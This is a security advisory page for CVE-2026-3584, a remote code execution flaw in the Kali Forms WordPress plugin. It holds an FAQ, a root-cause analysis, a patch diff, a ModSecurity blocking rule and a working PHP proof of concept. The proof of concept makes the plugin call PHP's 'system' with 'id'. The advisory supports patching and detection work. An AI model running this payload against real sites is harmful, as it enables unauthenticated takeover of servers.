What is CVE-2026-3584?

CVE-2026-3584 is a critical unauthenticated remote code execution vulnerability in the Kali Forms plugin for WordPress, affecting versions up to and including 2.4.9. It allows attackers to execute arbitrary code on the server by exploiting the form processing function.

How does the vulnerability work?

The vulnerability arises from the plugin’s failure to validate user-supplied field names before mapping them to internal storage. Attackers can submit form data with keys that match internal placeholder names, leading to the execution of arbitrary PHP functions via the ‘call_user_func’ method.

Who is affected by this vulnerability?

Any WordPress site using the Kali Forms plugin version 2.4.9 or earlier is vulnerable to CVE-2026-3584. Administrators should check their plugin version in the WordPress dashboard under the Plugins section.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Kali Forms plugin installed. If it is version 2.4.9 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Kali Forms plugin to version 2.4.10 or later, where the issue has been addressed. Regularly updating all plugins and themes is essential for maintaining site security.

What does a CVSS score of 9.8 indicate?

A CVSS score of 9.8 indicates that the vulnerability is critical and poses a significant risk to affected systems. This score reflects the potential for remote code execution without authentication, which could lead to full server compromise.

What practical risks does this vulnerability pose?

If exploited, this vulnerability could allow attackers to execute arbitrary commands on the server, leading to data theft, site defacement, or complete server control. This can result in severe consequences for the website and its users.

What is a proof of concept (PoC) in this context?

The proof of concept provided demonstrates how an attacker can exploit the vulnerability by sending a crafted POST request to the WordPress AJAX endpoint. It shows how specific field names can trigger the execution of arbitrary PHP functions.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Kali Forms plugin until a patch can be applied. Additionally, review server logs for any suspicious activity and enhance security measures.

How can I protect my WordPress site from future vulnerabilities?

To protect your WordPress site, regularly update all plugins and themes, implement security plugins, conduct routine security audits, and monitor for unusual activity. Educating yourself about common vulnerabilities can also help in proactive defense.

Can this vulnerability be exploited without authentication?

Yes, the vulnerability can be exploited by unauthenticated users, meaning that any visitor to the site can potentially trigger the exploit. This increases the urgency for site administrators to address the issue.

What are placeholder keys in the context of this vulnerability?

Placeholder keys are predefined keys used by the Kali Forms plugin to process form data. In this vulnerability, attackers can manipulate these keys to execute PHP functions, leading to remote code execution.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 29, 2026

CVE-2026-3584: Kali Forms <= 2.4.9 – Unauthenticated Remote Code Execution via form_process (kali-forms)

CVE ID CVE-2026-3584

Plugin kali-forms

Severity Critical (CVSS 9.8)

CWE 94

Vulnerable Version 2.4.9

Patched Version 2.4.10

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3584:
This vulnerability is an unauthenticated remote code execution flaw in the Kali Forms WordPress plugin, affecting versions up to and including 2.4.9. The vulnerability resides in the form processing component, specifically within the `form_process` function, and receives a CVSS score of 9.8 due to its network-based, unauthenticated nature and direct code execution impact.

The root cause is the plugin’s failure to validate user-supplied field names before mapping them to internal placeholder storage. In the vulnerable code, the `prepare_post_data` function (kali-forms/Inc/Frontend/class-form-processor.php) processes form submission data. It maps arbitrary keys from the `$data` array directly into the `$this->placeholdered_data` array. Later, the `_save_data` method uses `call_user_func` on values from this array. Attackers can submit form field names that match internal placeholder keys like `{entryCounter}`, `{thisPermalink}`, or `{submission_link}`, which the plugin treats as callable functions. The vulnerable code paths include the `check_if_placeholders_changed` method (lines 256-270) and the `prepare_post_data` method (lines 340-380), which iterate over `$this->data` and `$data` arrays without verifying if the keys exist in the `$this->field_type_map` array.

Exploitation occurs via a POST request to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php` with the `action` parameter set to `kaliforms_form_process`. Attackers craft a form submission containing a field name that matches a reserved placeholder key, such as `{entryCounter}`, and set its value to a PHP function like `system` or `shell_exec`. They pair this with another field containing the command to execute, for example `{submission_link}` with the value `id`. When the plugin processes the submission, it maps the attacker-controlled key into `$this->placeholdered_data`. The subsequent `call_user_func` call executes the attacker’s function with their supplied argument, leading to arbitrary code execution.

The patch introduces two key changes. First, it adds guard clauses in both `check_if_placeholders_changed` (line 263) and `prepare_post_data` (line 354) that skip processing any data key not present in the `$this->field_type_map` array. This prevents arbitrary user input from entering the placeholder system. Second, it adds a new private method `restore_internal_callable_placeholders` (lines 402-415) that explicitly resets the values of critical placeholder keys (`{entryCounter}`, `{thisPermalink}`, `{submission_link}`) to their original, safe defaults from the `GeneralPlaceholders` class. This ensures that even if an attacker bypasses the first check, the internal callable placeholders cannot be overwritten with malicious values.

Successful exploitation grants attackers the ability to execute arbitrary operating system commands with the privileges of the web server process. This typically results in full server compromise. Attackers can create backdoor access, exfiltrate sensitive data (including database credentials and user information), manipulate or delete website files, and use the server as a pivot point for further network attacks. The unauthenticated nature of the vulnerability means any site visitor can trigger the exploit.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/kali-forms/Inc/Frontend/class-form-processor.php
+++ b/kali-forms/Inc/Frontend/class-form-processor.php
@@ -256,11 +256,22 @@
 	public function check_if_placeholders_changed()
 	{
 		// 1.6.3 fix - the checkbox "string" value was overwritten with the "source of truth"
+		if ($this->post !== null && empty($this->field_type_map)) {
+			$prepared_maps            = $this->setup_field_map();
+			$this->field_type_map     = $prepared_maps['map'];
+			$this->advanced_field_map = $prepared_maps['advanced'];
+		}
+
 		foreach ($this->data as $key => $value) {
+			if (!array_key_exists($key, $this->field_type_map)) {
+				continue;
+			}
+
 			$type = 'textbox';
-			if (isset($this->field_type_map[$key]) && !empty($this->field_type_map[$key])) {
+			if (!empty($this->field_type_map[$key])) {
 				$type = $this->field_type_map[$key];
 			}
+
 			$this->_run_placeholder_switch($type, $key, $value);
 		}
 	}
@@ -340,8 +351,12 @@

 		$data = array_merge($data, $this->_get_product_fields($data));
 		foreach ($data as $k => $v) {
+			if (!array_key_exists($k, $this->field_type_map)) {
+				continue;
+			}
+
 			$type = 'textbox';
-			if (isset($this->field_type_map[$k]) && !empty($this->field_type_map[$k])) {
+			if (!empty($this->field_type_map[$k])) {
 				$type = $this->field_type_map[$k];
 			}

@@ -380,10 +395,28 @@

 		$this->placeholdered_data = apply_filters($this->slug . '_form_placeholders', $this->placeholdered_data);

+		$this->restore_internal_callable_placeholders();
+
 		return $data;
 	}

 	/**
+	 * Ensure built-in placeholder callbacks cannot be replaced by field names that mirror
+	 * reserved keys or untrusted POST keys (call_user_func targets in _save_data).
+	 *
+	 * @return void
+	 */
+	private function restore_internal_callable_placeholders()
+	{
+		$defaults = (new GeneralPlaceholders())->general_placeholders;
+		foreach (['{entryCounter}', '{thisPermalink}', '{submission_link}'] as $key) {
+			if (isset($defaults[$key])) {
+				$this->placeholdered_data[$key] = $defaults[$key];
+			}
+		}
+	}
+
+	/**
 	 * Get product total
 	 *
 	 * @param [type] $data
--- a/kali-forms/bootstrap.php
+++ b/kali-forms/bootstrap.php
@@ -15,4 +15,4 @@
 define('KALIFORMS_BASE_API', 'https://www.kaliforms.com/wp-json/wp/v2/');
 define('KALIFORMS_EXTENSIONS_API', 'https://kaliforms.com/wp-json/kf/v1/plugins');
 define('KALIFORMS_UNINSTALL_FEEDBACK_API', 'https://kaliforms.com/wp-json/kf/v1/uninstall-feedback');
-define('KALIFORMS_VERSION', '2.4.9');
+define('KALIFORMS_VERSION', '2.4.10');
--- a/kali-forms/kali-forms.php
+++ b/kali-forms/kali-forms.php
@@ -5,7 +5,7 @@
  * Plugin URI: https://www.kaliforms.com
  * Description: Kali Forms provides a user-friendly form creation experience for WordPress.
  * Author: Kali Forms
- * Version: 2.4.9
+ * Version: 2.4.10
  * Author URI: https://www.kaliforms.com/
  * License: GPLv3 or later
  * License URI: http://www.gnu.org/licenses/gpl-3.0.html

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3584
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:10003584,phase:2,deny,status:403,chain,msg:'CVE-2026-3584 Kali Forms RCE via AJAX',severity:'CRITICAL',tag:'CVE-2026-3584',tag:'WordPress',tag:'Kali-Forms',tag:'RCE'"
  SecRule ARGS_POST:action "@streq kaliforms_form_process" "chain"
    SecRule ARGS_POST "@rx {(entryCounter|thisPermalink|submission_link)}" 
      "t:none,t:urlDecodeUni,t:lowercase,t:removeWhitespace"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3584 - Kali Forms <= 2.4.9 - Unauthenticated Remote Code Execution via form_process
<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// The AJAX action for form processing
$post_data = [
    'action' => 'kaliforms_form_process',
    // Form ID - this must be a valid form ID on the target site
    'formId' => '1',
    // Nonce - not required due to the vulnerability
    'nonce' => '',
    // Payload: Field name matches the internal placeholder key {entryCounter}
    // The value is the PHP function to call (e.g., system, shell_exec, passthru)
    '{entryCounter}' => 'system',
    // Another field provides the argument for the function call
    // The plugin uses call_user_func with two arguments from placeholdered_data
    '{submission_link}' => 'id',
    // Additional dummy fields may be required depending on form configuration
    'dummy' => 'value'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Set headers to mimic a regular form submission
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/x-www-form-urlencoded',
    'X-Requested-With: XMLHttpRequest'
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if (curl_errno($ch)) {
    echo 'cURL error: ' . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response:n$responsen";
    // If the command executed, the output of 'id' will be in the response
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-3584?
Overview of the vulnerability
CVE-2026-3584 is a critical unauthenticated remote code execution vulnerability in the Kali Forms plugin for WordPress, affecting versions up to and including 2.4.9. It allows attackers to execute arbitrary code on the server by exploiting the form processing function.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s failure to validate user-supplied field names before mapping them to internal storage. Attackers can submit form data with keys that match internal placeholder names, leading to the execution of arbitrary PHP functions via the ‘call_user_func’ method.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Kali Forms plugin version 2.4.9 or earlier is vulnerable to CVE-2026-3584. Administrators should check their plugin version in the WordPress dashboard under the Plugins section.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Kali Forms plugin installed. If it is version 2.4.9 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Patch and update guidance
To mitigate this vulnerability, update the Kali Forms plugin to version 2.4.10 or later, where the issue has been addressed. Regularly updating all plugins and themes is essential for maintaining site security.
What does a CVSS score of 9.8 indicate?
Understanding the severity level
A CVSS score of 9.8 indicates that the vulnerability is critical and poses a significant risk to affected systems. This score reflects the potential for remote code execution without authentication, which could lead to full server compromise.
What practical risks does this vulnerability pose?
Potential impacts of exploitation
If exploited, this vulnerability could allow attackers to execute arbitrary commands on the server, leading to data theft, site defacement, or complete server control. This can result in severe consequences for the website and its users.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
The proof of concept provided demonstrates how an attacker can exploit the vulnerability by sending a crafted POST request to the WordPress AJAX endpoint. It shows how specific field names can trigger the execution of arbitrary PHP functions.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the Kali Forms plugin until a patch can be applied. Additionally, review server logs for any suspicious activity and enhance security measures.
How can I protect my WordPress site from future vulnerabilities?
Best practices for security
To protect your WordPress site, regularly update all plugins and themes, implement security plugins, conduct routine security audits, and monitor for unusual activity. Educating yourself about common vulnerabilities can also help in proactive defense.
Can this vulnerability be exploited without authentication?
Nature of the attack
Yes, the vulnerability can be exploited by unauthenticated users, meaning that any visitor to the site can potentially trigger the exploit. This increases the urgency for site administrators to address the issue.
What are placeholder keys in the context of this vulnerability?
Understanding internal mappings
Placeholder keys are predefined keys used by the Kali Forms plugin to process form data. In this vulnerability, attackers can manipulate these keys to execute PHP functions, leading to remote code execution.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations